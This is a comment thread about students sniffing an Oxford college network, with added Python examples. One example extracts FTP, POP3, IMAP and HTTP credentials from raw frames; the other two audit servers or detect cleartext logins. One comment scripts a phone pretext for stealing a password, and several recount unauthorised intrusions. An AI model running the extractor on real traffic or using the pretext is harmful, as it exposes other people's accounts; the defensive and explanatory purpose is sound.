When I was at high school I said to one of the IT teachers. You know, your network is incredibly insecure, he huffed and puffed. "Shall I show you?", says I, "Yes, please do" says he. I show him, he sends me to the headmaster, I get suspended for three days and the network remains broken. A fine reaction, best for all parties!
This situation seems rather similar: people working for the school paper hack without malicious intent, an embarrassed institution moves into oppressive mode. Although a law may have technically been breached, surely this wasn't against the spirit of it. They were not explicitly hoping to steal information, and they reported exactly what they found.
These people are not being punished for breaking the security of the network, but for their disclosure thereof. A stupid reaction, by what purports to be an intelligent institution.
[I am an IT professional at University of Oxford, but I'm not associated with the College concerned - just passing on what I've heard locally].
One thing that doesn't come out very clearly in the Oxford Student article, or the subsequent press coverage, is the nature of the "hack".
As I understand it, the college that the students attend still uses some ethernet hubs, rather than switches (this is where the quote about the "cost" of security comes from), and the students just packet-sniffed the traffic that was going past on their local network segment. They found exactly what anyone who knows a bit about networks would expect to find.
The problem (as so often!) is more social than technological: the users of the network have expectations of privacy which the implementation doesn't provide.
The failing on the part of the University is not so much in the area of technology and IT security as in the area of user education: people using the facilities need to be made aware that the ethernet that you share with a couple of hundred other students is in no way private, any more than a conversation held in the JCR (college bar) is ...
The University is, on the whole, very security conscious. The mail servers, shell machines, web servers, etc, provided by the central Computing Service all provide access via SSH or SSL encrypted connections (and frequently, for anything that requires a username and password, only via such connections).
One thing that does puzzle/concern me is the allegation that a CCTV feed was accessed. So far as I know, all the CCTV systems operated by the University security service run over separate fibre optics and are kept strictly segregated from the general purpose data network.
When you look at what they technically actually did.
They ran a packet sniffer on a network and managed to log plain-text protocols.
Now I understand freedom of press is important, but not when it is being used to prove things that have been known for years and could be proven without breaking the law.
All they had to do was look at the bit saying HTTP instead of HTTPS on the URL for the webmail and they could have drawn the same conclusions without touching anyone else's private data and without breaking the law.
I fail to see why freedom of press comes into it, freedom of idiots maybe.
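The thread keeps coming back to the same mechanism: on a hubbed segment (or a switch you can get to mirror traffic), a sniffer sees every frame, and POP3, IMAP, FTP and HTTP Basic auth all put the password on the wire in the clear. The example below, added here and not code from the students, the Oxford Student or any of the posters, shows exactly what such a sniffer has to do: parse Ethernet/IPv4/TCP framing and pull credentials out of the payloads. The frames it runs on are constructed inline (10.0.0.5 talking to 10.0.0.1, with made-up usernames and passwords), not a real capture; to run it against a live interface you would feed it raw frames from a promiscuous-mode socket or a pcap reader instead of SAMPLE_FRAMES.

```python
"""Extract credentials sent in the clear from raw Ethernet/IPv4/TCP frames.

Added example, not the original page's code. Frames below are constructed
test data; the parsing logic is the general technique a LAN sniffer uses.
"""
import base64
import struct


def build_frame(src_port, dst_port, payload, src=(10, 0, 0, 5), dst=(10, 0, 0, 1)):
    """Assemble a minimal Ethernet + IPv4 + TCP frame around payload (test data only)."""
    eth = b"\xaa" * 6 + b"\xbb" * 6 + struct.pack("!H", 0x0800)       # EtherType IPv4
    tcp = struct.pack("!HHIIBBHHH", src_port, dst_port, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
    total_len = 20 + len(tcp) + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0, 64, 6, 0,
                     bytes(src), bytes(dst))                             # proto 6 = TCP
    return eth + ip + tcp + payload


def parse_frame(frame):
    """Return (src_ip, dst_ip, src_port, dst_port, payload), or None if not IPv4/TCP."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":
        return None
    ihl = (frame[14] & 0x0F) * 4                    # IPv4 header length in bytes
    total_len = struct.unpack("!H", frame[16:18])[0]
    if frame[23] != 6:                              # IP protocol field: 6 = TCP
        return None
    src_ip = ".".join(map(str, frame[26:30]))
    dst_ip = ".".join(map(str, frame[30:34]))
    t = 14 + ihl                                    # start of TCP header
    src_port, dst_port = struct.unpack("!HH", frame[t:t + 4])
    data_off = (frame[t + 12] >> 4) * 4             # TCP header length in bytes
    payload = frame[t + data_off:14 + total_len]    # ignore any Ethernet padding
    return src_ip, dst_ip, src_port, dst_port, payload


def extract_credentials(frames):
    """Walk frames in order; return (protocol, dst_ip, user, password) for each
    credential sent in the clear. USER/PASS pairs are matched per TCP flow."""
    pending = {}     # flow -> username seen, waiting for the PASS line
    found = []
    for frame in frames:
        parsed = parse_frame(frame)
        if parsed is None:
            continue
        src_ip, dst_ip, src_port, dst_port, payload = parsed
        flow = (src_ip, dst_ip, src_port)
        text = payload.decode("latin-1")            # never raises, keeps bytes 1:1
        if dst_port in (21, 110):                   # FTP / POP3: USER x then PASS y
            proto = "ftp" if dst_port == 21 else "pop3"
            for line in text.splitlines():
                if line.upper().startswith("USER "):
                    pending[flow] = line[5:].strip()
                elif line.upper().startswith("PASS ") and flow in pending:
                    found.append((proto, dst_ip, pending.pop(flow), line[5:].strip()))
        elif dst_port == 143:                       # IMAP: <tag> LOGIN user pass
            for line in text.splitlines():
                parts = line.split()
                if len(parts) >= 4 and parts[1].upper() == "LOGIN":
                    found.append(("imap", dst_ip, parts[2].strip('"'), parts[3].strip('"')))
        elif dst_port == 80:                        # HTTP: Authorization: Basic b64(user:pass)
            for line in text.splitlines():
                if line.lower().startswith("authorization: basic "):
                    try:
                        user, _, pw = base64.b64decode(line.split()[2]).decode("latin-1").partition(":")
                    except (ValueError, IndexError):
                        continue
                    found.append(("http", dst_ip, user, pw))
    return found


# Constructed sample traffic (not a real capture): one POP3 login, one IMAP
# LOGIN, one webmail request with Basic auth, and one TLS record for contrast.
SAMPLE_FRAMES = [
    build_frame(40001, 110, b"USER alice\r\n"),
    build_frame(40001, 110, b"PASS hunter2\r\n"),
    build_frame(40002, 143, b'a001 LOGIN "bob" "s3cret"\r\n'),
    build_frame(40003, 80, b"GET /webmail/ HTTP/1.0\r\nHost: mail.example.org\r\n"
                           b"Authorization: Basic " + base64.b64encode(b"carol:letmein") + b"\r\n\r\n"),
    build_frame(40004, 443, b"\x16\x03\x01\x00\x05hello"),   # encrypted: nothing readable
]

if __name__ == "__main__":
    for proto, host, user, pw in extract_credentials(SAMPLE_FRAMES):
        print(f"{proto:5} -> {host}: {user} / {pw}")
```

The point the example makes is the one the poster makes: nothing here is clever. The only "work" is knowing the header layouts and the four protocols' login syntax; the TLS frame on port 443 yields nothing, which is the whole argument for HTTPS and SSL-wrapped mail. The real mitigation is upstream of the sniffer: switched segments and, above all, servers that refuse the plaintext login in the first place.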
I'm a postgraduate at my university, and the BOFH that runs the IT network treats us like a bunch of criminals, even us postgrads. He's a total and utter bastard, and they lock down the network so tight that we spend 30% of our time dealing with the restrictions. ..yet they allow IE on the PC's.
ssh and minute social engineering skills?
The ordinary and practical distinction is between murder and manslaughter, an assault that ends in death though you never intended to kill. Both are homicides and both are criminal.
The problem is it's not in the IT guy's interests to fix it or let anyone know it's broken, so if you bring it up with them they're just gonna pretend you broke it and make a fuss. The people at the top don't want that sort of reputation either, so they're not going to side with the bringer of bad news as long as they think they can make it all go away. If you believe the security is bad enough to put you at risk you could always rat the little buggers out; the Data Protection Act will cover your ass here. You have the right for your personal data to be kept secure, but you don't have the right to break it, so if you have done, keep very very quiet about it and just point someone else in the right direction. Anonymous letters might be a good option if you want it on the front page.
This comment does not represent the views or opinions of the user.
Firstly, it's not "principle", it's "Principal", and even if it was, it would be "principle's office". Secondly, I doubt Oxford has a Principal. The normal head of a UK university is the Vice-Chancellor, but Oxford like to do things differently so maybe it's a Rector.
Quite right, and they're not 'kids' either - they're adults. The head of OU is the Vice-Chancellor but he'll be far too busy for such things as this. Appropriate people to talk to (the chain of command if you like) would be college or university IT support staff, college officials and lastly the Proctors - those responsible for student discipline and the actions being taken on these individuals.
But with the name and password of the admin account simply "admin" it was more their stupidity than my genius. At some point they detected my presence (ok, maybe I shouldn't have replaced the default background on all of the school computers) and shut down all of the computers on campus to figure out what happened. They never really discovered it was me, hence no punishment! They gave a stiff warning that they would punish anyone responsible for such hijinks in the future, and I decided that it wasn't worth providing them with any more motivation to catch me.
Well.. maybe. Or Maybe not. But Definitely not sort of.
And on another level, they can force people to use some amount of SSL. Make the mail server SSL-only, for instance. This is especially the case at my university: each student is issued a standard university ThinkPad, and they can control the load on those things. Set up a secure POP connection, have the new laptops set up to use it, and within one replacement cycle (two years) you can have everyone checking their mail securely. Would this be excessively burdensome? It won't protect your web mail or Slashdot account from packet sniffing, but it keeps your email (which usually shares your Important University Password) nice and secure!
(Incidentally, they've been loading Mozilla on them for mail and browsing. I can only see good coming of that, at least.)
The World Wide Web is dying. Soon, we shall have only the Internet.
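The poster above wants the mail server made SSL-only so that the students' "Important University Password" stops crossing the hub in the clear, and a later comment asks whether anyone still runs IMAP over a plaintext connection. Whether a server actually enforces that is visible in its capability advertisement before any password is sent: RFC 3501 IMAP servers that refuse plaintext LOGIN advertise LOGINDISABLED (with STARTTLS) until the session is encrypted, and an RFC 2449 POP3 CAPA response that lists USER, or SASL PLAIN/LOGIN, on an unencrypted connection will take a cleartext password. The check below is an added example, not code from the page or from any Oxford service; the capability responses it inspects are constructed inline, and the server labels "mail-a" and "mail-b" are made up.

```python
"""Decide from IMAP/POP3 capability advertisements whether a server will accept
a password in the clear. Added example; the responses below are constructed."""
import re

# SASL mechanisms that transmit the password itself rather than a proof of it.
CLEARTEXT_MECHS = {"PLAIN", "LOGIN"}


def parse_imap_capabilities(line):
    """Uppercase token set from an untagged '* CAPABILITY ...' response."""
    m = re.match(r"\*\s+CAPABILITY\s+(.*)", line.strip(), re.IGNORECASE)
    return {tok.upper() for tok in m.group(1).split()} if m else set()


def parse_pop3_capabilities(response):
    """Map capability name -> argument list from a multi-line CAPA response
    ('+OK ...' then one capability per line, terminated by '.')."""
    caps = {}
    for raw in response.splitlines():
        line = raw.strip()
        if not line or line.startswith("+OK") or line == ".":
            continue
        name, *args = line.split()
        caps[name.upper()] = [a.upper() for a in args]
    return caps


def accepts_plaintext_login(protocol, response, over_tls=False):
    """True if a client could hand this server its password unencrypted."""
    if over_tls:
        return False                    # session already encrypted (STARTTLS done, or port 993/995)
    if protocol == "imap":
        caps = parse_imap_capabilities(response)
        if not caps:
            raise ValueError("not a CAPABILITY response")
        cleartext_sasl = any(c.startswith("AUTH=") and c[5:] in CLEARTEXT_MECHS for c in caps)
        # Without LOGINDISABLED the server will honour LOGIN; AUTH=PLAIN/LOGIN is no better.
        return "LOGINDISABLED" not in caps or cleartext_sasl
    if protocol == "pop3":
        caps = parse_pop3_capabilities(response)
        return "USER" in caps or bool(CLEARTEXT_MECHS & set(caps.get("SASL", [])))
    raise ValueError(f"unknown protocol {protocol!r}")


def audit(banners):
    """banners: list of (label, protocol, response). Returns [(label, verdict)]."""
    return [(label, "plaintext login possible" if accepts_plaintext_login(proto, resp) else "ok")
            for label, proto, resp in banners]


# Constructed responses, not captured from any real server.
GOOD_IMAP = "* CAPABILITY IMAP4rev1 STARTTLS LOGINDISABLED"
BAD_IMAP = "* CAPABILITY IMAP4rev1 AUTH=PLAIN AUTH=LOGIN"
GOOD_POP3 = "+OK Capability list follows\r\nTOP\r\nUIDL\r\nSTLS\r\n.\r\n"
BAD_POP3 = "+OK Capability list follows\r\nTOP\r\nUSER\r\nSASL PLAIN LOGIN\r\n.\r\n"
SAMPLE_BANNERS = [
    ("mail-a imap", "imap", GOOD_IMAP),
    ("mail-a pop3", "pop3", GOOD_POP3),
    ("mail-b imap", "imap", BAD_IMAP),
    ("mail-b pop3", "pop3", BAD_POP3),
]

if __name__ == "__main__":
    for label, verdict in audit(SAMPLE_BANNERS):
        print(f"{label:12} {verdict}")
```

On a real deployment the "good" shape is what you get from a server configured to refuse plaintext authentication until TLS is up (in Dovecot, for instance, `disable_plaintext_auth = yes` together with `ssl = required`); the check can be pointed at a live server by reading the pre-STARTTLS greeting and CAPABILITY/CAPA response over a plain socket and passing it in with `over_tls=False`.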
Suppose in America the majority begins to infringe on the free speech or exercise of religion rights granted by the Constitution. Does that make it right?
At the heart, you're advocating a "might makes right" system. Do you really want to live under the "law of the jungle"?
"Using easily available software". Does this say script kiddie or not?
http://www.macinhack.com
Way back, when I was about 12 or 13 and networks were rather less advanced, I identified a potential security flaw with the system at school. I was on good terms with the teacher responsible for IT, and suggested that it might be prudent to address it. She asked me to try to hack the system, to find out if it really was a vulnerability. The following day, I told her her own password.
She physically locked me out of the computer room for a week, along with one of my friends who'd been in on the game, while she worked out how to close the loophole. :-)
The people I always felt really sorry for were the kids two or three years younger than us. It was normal for a couple of sixth formers (for non-Brits: 17-18 year olds, the oldest generation in the school) to help with the sysadmin jobs, and my friend and I were nominated. When the same two or three "loopholes" were found and "exploited" by the younger kids, their screens started flashing bright red and the PC speaker locked on until they managed to struggle under the desk and flip the boxes off at the plug, thanks to a couple of... um... extra software installations, courtesy of the sysadmin team. Needless to say, by the time they emerged from under said desk, the whole room would be looking at them and I or one of my colleagues would be standing behind them with Stern Look #673 firmly in place.
Of course, we were always smiling with quiet admiration on the inside, and I always felt really bad about doing that to them. }:-)
If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
I got a two day suspension for it! (high school) Be proud that it was harder to get a suspension than at our high school. If you were doing an incorrect shutdown of the computer and ScanDisk was coming up on the next reboot, the last user was getting a 2-day suspension. They claimed ScanDisk "could severely damage the computer".
Remi
Home sweet localhost.
I'm sure this kind of stuff is commonplace in universities. I myself knew people who had or could get root access on machines from where (anything goes); in fact we had a room of NeXT stations that were mysteriously taken offline after someone I knew ran the unix "crack" password cracking tool on them. Another friend of mine had similar experiences at his uni.
Generally speaking it must be very difficult to ensure a secure network at a uni. The sheer variety of different machines and operating systems, and the ad-hoc nature of the network will invariably leave gaps in the security.
However I'd like to hope that most students are just exercising their inquisitive nature and doing little harm in the process; after all, University is "yours" just as much as it is the people who run or own it. It is a seat of learning after all!
nick
Electronic Music Made Using Linux http://soundcloud.com/polyp
I believe that it is the law in England (and Wales) that if you know of a criminal act taking place then if you do not report it to the police then you are deemed to be an accessory after the fact and have hence committed a criminal act yourself.
Therefore, once the University was informed of the criminal acts (breach of the Computer Misuse Act) they had to inform the police. They had no choice in the matter.
Agrajag: "Oh no, not again!"
That's what I love about this country. If you do something like this, particularly at a state University, you could face felony charges.
Reminds a bit of a dumb phone call tracking system we have at my work. I noticed it records the hash key presses and the customer numbers and pins of everyones telephone banking. Silly old phone system
While this thread is tired now, I'd like to make the following point:
IANAL but:
Surely, as a data controller, UO has breached its DPA 1998 duties. Also, would the university be liable for a class-action lawsuit by students who are the data subjects of data held on UO boxen?
When i was at collage...
And, um, which collage did you go to?
Evil is the money of root.
Even in those cases where you do have the budget for an experienced network admin, all you've done is made it so that the weak link is no longer the network. Now, it's the users.
*ring *ring*
User: "Hello?"
Hacker: "Hi, is this Jane Doe?"
User: "Yes, who's this?"
Hacker: "Hi Jane, my name is Dirk Diggler, I'm with the university's computer department. We're presently migrating all of the user data for the arts department, and we need to copy your data over to the new server. Don't tell me your password; as you should know, you should never give away your password. However, we do need to access your account to make sure all of your data is successfully backed up, so what I need you to do is to log into your account, and change your password to 'test' for now. Once we've finished moving your data, I'll call you back and get you to change it back to whatever it is right now."
User: "Uh, OK, how do I change my password?"
Like woodworking? Build your own picture frames.
That is always the best idea. If someone exposes your security flaws, fine them and call the police.
Many young men are so naive about social power hierarchy.
Please, all future kiddie hackers, realise that people in power are *always* more concerned about their power than about technology flaws or the productivity/effectiveness of systems they control. And showing their failure in public makes them very angry, because it can endanger their image of power control the most.
Next time, if you do it for sport, do it quietly. Make yourself an outer image of a complete moron. Enjoy your insight. Fame is without purpose for you.
There you are, staring at me again.
I mean, who in their time at Oxford didn't load up their favourite ethernet sniffer, and take a look at the traffic flowing past (usually, the networks are made up of hubs connected to switches, owing to cost, so you can see traffic for 10-20 other computers). The difference with myself was I then showed this to the college IT officer, rather than the student papers, so actually got something fixed.
The big problem is lack of funds and lack of time. College IT people (the sniffing in question took place in a college, on the college network, not the main uni network) tend to have themselves and an assistant to look after a few hundred student machines, a few tens of multi user workstations, and then all the machines of the staff (50 odd, and must take priority). Oh, and they don't have enough budget. That's why the problems remain.
For anyone who knows Oxford, one of my friends wrote a very good spoof of this - http://www.ox.compsoc.net/~sheldon/oxstu.html (if you don't know Oxford, you might struggle to get all the points...)
This post will enter the public domain 70 years after my death, unless Disney buys another extension.
Well, leave it to some students to hack into their school's network! It's awful what they did, but even worse, the network shouldn't be so insecure; I feel bad for students that might have gotten their passwords stolen. The network admins should make sure it doesn't happen again. They could do some nasty shit, like change passwords and lock people out of the server, they could delete files, and if it had NetBIOS or some crap like that they could bring down many computers in their network, and all kinds of malicious stuff.
Were they whitehat or were they blackhat?
Shame on the admins, shame on them.
Yesterday I was in Staples and they have those keychain wifi detectors. I clicked the button through the plastic to see if they had batteries in them already and, not surprisingly, there's an unsecured wifi network in the building. After looking around and not finding any display PCs running on wifi I figured it's the cash registers (it was an 802.11g network) and just let the matter drop.
I could tell them about it but then you'd probably be reading about me in another week.
The reason why this is important is because of the idea of immediacy. When a person is looking at a headline, they determine whether or not it has any bearing to them. If an article doesn't have any immediacy to them personally or to their interests in general, then it doesn't get read.
There is little technical difference between these two headlines, however from the point of view of an Oxford student, there would be a world of difference. Consider:
Headline one: HTTPS provides encryption that HTTP does not.
Headline two: Private computer conversations at Oxford easily monitored by anyone.
However, they didn't just log some passwords sent in the clear; according to the article (you did read it, did you not?) they had the ability to view and to some degree control the pervasive CCTV security network. This is a big deal, for a whole lot of reasons.
You say things about stuff that's been known for years and provable without breaking the law. Known by whom? I would guess this stuff wasn't known by the general public at Oxford, the population that that particular paper is supposed to inform and serve.
If you fail to see why it's important that the press informs the population about security matters in a time of echelon, and increasing government infringements on the rights of ordinary citizens, then you might want to spend a little more time meditating on the phrase that you used, freedom of idiots...
HaXXXor.com - Naked Chicks Teach You How To Ha
We have this thing called the Internet now. And hence, you don't need to do any 'system programming' to snoop network traffic. The tools are widely available.
If student rumour is correct, there's an unrepealed Oxford law by which Crusaders on their way to the Holy Land could stop by and pick up a degree. Apocryphally, students have tried to invoke this right and been turned down by the Proctors because they weren't wearing their swords when the claim was made.
There is also meant to be a law still in force by which you can request a glass of sherry be brought to you during Finals exams. I don't know if anyone has had the balls to try it - it's exactly the sort of thing the Proctors find unamusing.
Cracking into a computer is wrong (unless you have written authorization to do so). Their intent wasn't malicious, but the lack of respect in not informing people before the article went to print is in and of itself malicious.
They should be made examples of and summarily expelled for their actions.
It sure is unfair that you are being punished, by "possible suspension", for committing a crime that would land some of us in prison for at least 5 years.
I am Bennett Haselton! I am Bennett Haselton!
However, no-one knew about this apart from us. After explaining things to the college, they let us go and kept pretty quiet (i.e. they didn't tell CERT, which they were supposed to). The bottom line is, if you go public with any security breach you damage the public image of the university/college/IT department. They really hate it when you do that, mainly because they think it will have some effect on charitable donations and the political popularity of the Oxbridge system.
The thing is, in your first year you probably don't realise how touchy staff can be.
OK, I went to a fairly typical good English University so your experiences in the states may be different but...
"Some colleges and unis send grades, schedules and who knows what else directly to students' email. Pretty handy for a stalker right?"
Perhaps - but I'm not sure what a stalker would do with a set of exam results. I mean medical results are obviously confidential, but exams people generally tell all and sundry about (if you do well, to boast; if you do poorly, to complain about the questions being harder than the past papers). Besides, a person's exam results, like their timetables, are generally available on the student noticeboards (and the departmental websites), so cracking their email doesn't make much difference. As for campus doctors, I would be very annoyed if I was sent anything more personal than perhaps a time for an appointment via email, but all doctors I've had are pretty sensible people and wouldn't send that sort of information through an insecure medium (which, unfortunately, at university includes the post).
The public availability of exam results is important for employers and students - because here in Britain most exam results are published (for some professional qualifications such as the law and accountancy they are put in the national papers!), there is far less risk that students will lie about their grades to an employer, thereby protecting the honest employees.
just my 0.031 euros worth...
Oxford has never heard of secure services. C'mon, do people still run IMAP over a plaintext connection? If you are guilty of this, you are an idiot.
It is always difficult to get people to understand that just because they are behind a firewall, virus-scanner, and NAT router (etc), they are not necessarily secure. Harder so when you tell people this and their eyes glaze over.
In short, not everyone reads slashdot. Many people going to college, are not going for IT.
As for showing how the system is not secure, that in itself is difficult to explain to laymen, and sometimes to people who do have half a clue. But messaging, e-mail and the like which is sent plaintext is by no means secure. That is what my first point was about: unless the system is using SSL, Blowfish, or whatever tickles your fancy in cryptography, it is not going to be secure, and that is half a folly usually on the end user. The other half, yes, lies with the system for not implementing the security measures, but they usually are not implemented anyway unless in a high security setting.
It is not a dream to talk to people and see if it is ok to do something first. It is civil. White-hats don't go around and break into systems all willy-nilly, then post an article that tells the people what is wrong (the administration as well as possible other types that could use it for much worse causes). They would have contacted the people either beforehand, or right after the fact. I am NOT calling them Black-hat by any means, but they are not White-hat either. I think Gray-hat fits here.
As for altruism on the part of the journalists, I really do doubt that; I think it was more ego masturbation than anything, and people who know the journalists will probably be saying "Sw337, Ur 50 1337". (Sarcasm aside, I really think people will eat up this juvenile way of getting information [packet sniffing].)
But I also would like to see what happens to them, I hope it's just a slap on the wrist, I really do. But I also don't feel that making them into slashdot saints does any good either.
Thanks for the Counter-Points mate; I always appreciate a good argument.
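The two posts above make the same point from opposite sides: mail and IM sent in the clear (the "IMAP over a plaintext connection" complaint, and the "unless the system is using SSL" point) expose every login to anyone on the same network segment. From the administrator's side, the practical question is how to find out which clients are still authenticating in the clear so they can be fixed. The following is an added example, not code from the thread or from any university's systems, of a small detector that scans captured TCP payload lines for cleartext mail logins (IMAP LOGIN, POP3 USER/PASS, SMTP AUTH PLAIN), tracks STARTTLS so that a flow that upgraded to TLS is not flagged, and records only the username (never the password) for notifying the account owner. The packet lines, addresses and usernames are all constructed for the example.

```python
import base64
import re
from dataclasses import dataclass

# Constructed sample payloads in the shape a simple capture summary might give:
# (flow id, server port, payload text). No real hosts, users or passwords.
SAMPLE_PACKETS = [
    ("10.0.0.5->10.0.0.20", 143, "a001 LOGIN jsmith hunter2"),
    ("10.0.0.6->10.0.0.21", 110, "USER mbloggs"),
    ("10.0.0.6->10.0.0.21", 110, "PASS letmein"),
    ("10.0.0.7->10.0.0.22", 587,
     "AUTH PLAIN " + base64.b64encode(b"\0alice\0s3cret").decode()),
    # This flow upgrades to TLS first; anything after STARTTLS would be
    # ciphertext on the wire, so the detector must not flag it.
    ("10.0.0.8->10.0.0.22", 587, "STARTTLS"),
    ("10.0.0.8->10.0.0.22", 587,
     "AUTH PLAIN " + base64.b64encode(b"\0bob\0pw").decode()),
    ("10.0.0.9->10.0.0.20", 143, "a002 STARTTLS"),
    ("10.0.0.9->10.0.0.20", 143, "a003 LOGIN carol pw"),
    ("10.0.0.5->10.0.0.20", 143, "a002 SELECT INBOX"),
]


@dataclass(frozen=True)
class Finding:
    flow: str
    protocol: str
    username: str  # kept so the account owner can be told to re-configure
    # The password is deliberately never stored; only its exposure is recorded.


IMAP_LOGIN = re.compile(r"^\S+\s+LOGIN\s+(\S+)\s+\S+", re.IGNORECASE)
POP_USER = re.compile(r"^USER\s+(\S+)", re.IGNORECASE)
POP_PASS = re.compile(r"^PASS\s+\S+", re.IGNORECASE)
SMTP_AUTH_PLAIN = re.compile(r"^AUTH\s+PLAIN\s+(\S+)", re.IGNORECASE)
# IMAP prefixes commands with a tag, SMTP does not; accept both shapes.
STARTTLS = re.compile(r"^(?:\S+\s+)?STARTTLS\b", re.IGNORECASE)

PORTS = {143: "IMAP", 110: "POP3", 25: "SMTP", 587: "SMTP"}


def _plain_username(token):
    """SASL PLAIN is base64('authzid\\0authcid\\0password'); keep only authcid."""
    try:
        parts = base64.b64decode(token, validate=True).split(b"\0")
    except ValueError:
        return "<unparsed>"
    if len(parts) != 3:
        return "<unparsed>"
    return parts[1].decode("utf-8", "replace")


def find_cleartext_logins(packets):
    """Return one Finding per credential sent in the clear, in capture order."""
    findings = []
    upgraded = set()        # flows that issued STARTTLS; later bytes are ciphertext
    pending_pop_user = {}   # flow -> USER name waiting for its PASS line
    for flow, port, payload in packets:
        proto = PORTS.get(port)
        if proto is None or flow in upgraded:
            continue
        if STARTTLS.match(payload):
            upgraded.add(flow)
            continue
        if proto == "IMAP":
            m = IMAP_LOGIN.match(payload)
            if m:
                findings.append(Finding(flow, proto, m.group(1)))
        elif proto == "POP3":
            m = POP_USER.match(payload)
            if m:
                pending_pop_user[flow] = m.group(1)
            elif POP_PASS.match(payload):
                user = pending_pop_user.pop(flow, "<unknown>")
                findings.append(Finding(flow, proto, user))
        elif proto == "SMTP":
            m = SMTP_AUTH_PLAIN.match(payload)
            if m:
                findings.append(Finding(flow, proto, _plain_username(m.group(1))))
    return findings


if __name__ == "__main__":
    for f in find_cleartext_logins(SAMPLE_PACKETS):
        print(f"{f.protocol:5} cleartext login for '{f.username}' on {f.flow}")
```

The point of the STARTTLS bookkeeping is that a port number alone does not tell you whether a session is encrypted: 143 and 587 carry both cleartext and TLS-upgraded sessions, so the detector has to follow each flow's state. The only durable fix is on the server side (refuse LOGIN/PASS/AUTH before TLS and offer IMAPS/POP3S), at which point this check should produce no findings at all.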
Charge Reduced For N.C. Student Who Hid Box Cutters On Plane
Short summary -- student hid box cutters on a flight in order to demonstrate the weak airport security. The cops were not amused.
Chip H.
EECS700 II at the University of Kansas deals a lot with breaking into security systems in a practical manner. Though we had to sign a document saying that we would not use the skills we were learning to break into the campus network, at the risk of failing the class and possibly being removed from school entirely.
The entire class revolved around installing Linux on machines, and then securing them as well as possible with a weekly or bi-weekly evaluation of the computers' defences. (i.e., if we hadn't shored up the machine to a specific attack we would lose points).
It was a very interesting class, and has kept me interested in network computer security.
(remember, if all else fails put a little PAM on it!)
If you don't vote, you don't matter, so don't waste your time telling me your opinion
Why all these intrusive and secure measures just for a college campus? It's not a military base or anything....
Light travels faster than sound. This is why some people appear bright until you hear them speak.........
This story reminds me of two final-year students in my old CompSci class (at London). They broke into the department's system and read the mail of the lecturers for months, distributing grades to their friends before they were released and generally messing around with the system while covering their tracks.
Just after their final exams, they got caught, and after a short investigation their degrees were annulled. I remember how odd it was at our graduation ceremony when we were all walking around with our families in our caps and gowns, and these two guys showed up alone wearing shorts and T-shirts, just to say goodbye to their friends.
So they wasted three years of study for a little hacking. I often wonder where they are now.
---- scrm
I see a lot of value in this. I lately saw a TV program that showed how easy it is to break into a normal (let's say un-patched) house. I take it seriously now, as I previously felt secure.
Ok, what's your address? We'll slashdot your house.
2. show the pilot on the next flight I'm on how easy it is to get a gun through airport security
Applies to the logic on point 1. If you can show this to be true, we all will be much better off.
You're right. We would be even better off if everyone who flies tries to smuggle a gun aboard. The more people who test the security, the better the chances are of us helping them find all of their security flaws. Yeah, that would work really well...
Hold it there, cheap in no way means insecure.
Why bother.
Why? because we need it. (ok I work for a different univ. and not much for CCTV but we have swipe cards here and there).
The thing is Universities are great targets for small time criminals. Lots of people going in and out, many faces, unattended equipment. At least with swipe card access, you can be somewhat sure that people in the area are supposed to be there. It helps.
It doesn't stop door jacking of course, which was one of my favorite techniques at a previous job (wouldn't give me card access to some areas before 9 am, even though I started at 8 and often had jobs to do in there, so I would just door jack my way in, and get my work done)
You'd be amazed at the things that can go on on a campus. Some amount of security is important, there's basically 3 types of areas they need to secure. 1) places where people live (dorms... Frats are generally completely open and the U doesn't give a fuck), 2) places with lots of expensive computer equipment 3) Dangerous labs.
Just ask some student friends of mine who rented a house off campus last year. They threw some great parties, and had 11 people living in the house. There was so much in and out foot traffic that they had problems with people walking in off the street and stealing things.
It's easy for places with a lot of people traffic to get a high profile and become a target.
-Steve
"I opened my eyes, and everything went dark again"
I must agree (even though I think you are being sarcastic), that is exactly the OpenSource method applied to the real world. Why do you think companies pay people to test their services (for example by trying to return a defective item)? There is a big incentive to test the systems out there and the real change in our way of doing things would be to challenge how it is done.
In the context of this story I must add that it is the journalist's job to check if the system is working.
The first college I went to had this poorly secured novell network running on an old Vax cluster.
They had it set up so that, to use a computer, you logged in as the computer, instead of as a user. I found out that, if you logged a PC into the network using a username meant for a Mac, and if that Mac were not already logged in, it would completely screw up your privileges, and let you do many things normally reserved for "Administrator".
Friend of mine wrote a batch script to send out an amusing system message once an hour. Unfortunately he didn't count zero correctly, and so the first one was an hour, but the second through 1000000th were somewhat quicker.
The first I knew of it was when I walked into a computer lab and heard this symphony of "beepbeepbeepbeepbeep" and saw a couple of lab techs ripping the cables and stuff off of this poor little Mac while screaming, "IT'S UNPLUGGED! WHY IS IT STILL SENDING MESSAGES?!?!"
ad logicam: Claiming a proposition is false because it was presented as the conclusion of a fallacious argument.
I went to LSU....and while there is crime there as much as any other campus, we didn't need such draconian measures. Rooms with equipment were locked...labs were opened by the lab asst. when we had class there....we had locks on our dorm rooms...
Now grant it...an axe murderer could have come in and taken out a whole floor in our dorm and no one would have noticed for weeks...but, the girls dorms had a check-in counter you had to pass by to gain access. Hell, one guy I knew had a chick living with him in his dorm room for a semester...and it wasn't a co-ed dorm.
LSU is a pretty big campus....and with a large campus, you always have crime, but, no worse than a large city has....so, I still don't see the need for such 'high security' measures at a college campus. The enrollment there is usually about 31,000...... I'd guess this is a bit larger than Oxford, and there wasn't that much of a problem without all those measures. It is a school...not a prison.
Light travels faster than sound. This is why some people appear bright until you hear them speak.........
Even if they HAD "broken in". Free security audit! It sounds like what they were doing were things you can do without cracking much of anything. IM and email packets are flying around the network willy-nilly, unencrypted. It's only a matter of time before someone takes the effort to look at them...how on earth do they get punished for THAT? Then again, I guess it's easier to just make a thing illegal than it is to actually protect yourself against it.
Dammit I thought the days of people pissing themselves over "hackers" were over.
They should have read Business 101 instead. Think of all the money they could have made by selling email addresses of all the hot girls on campus.
....a hacked computer. See, we're very materialistic people (shallow of course). We look at stealing and breaking in as a physical thing...where the *thief* takes something...and runs with it. I am sure someone that physically stole a computer is more likely to go to jail than someone who stole the content stored as 1s and 0s (if they are caught that is).
Until the danger of stealing information stored digitally is fully understood, we'll never come up with (or enforce) laws that will punish such an act. I have no problem if someone stole my laptop...but I'd have a problem if they stole what's on the Hard Drive.
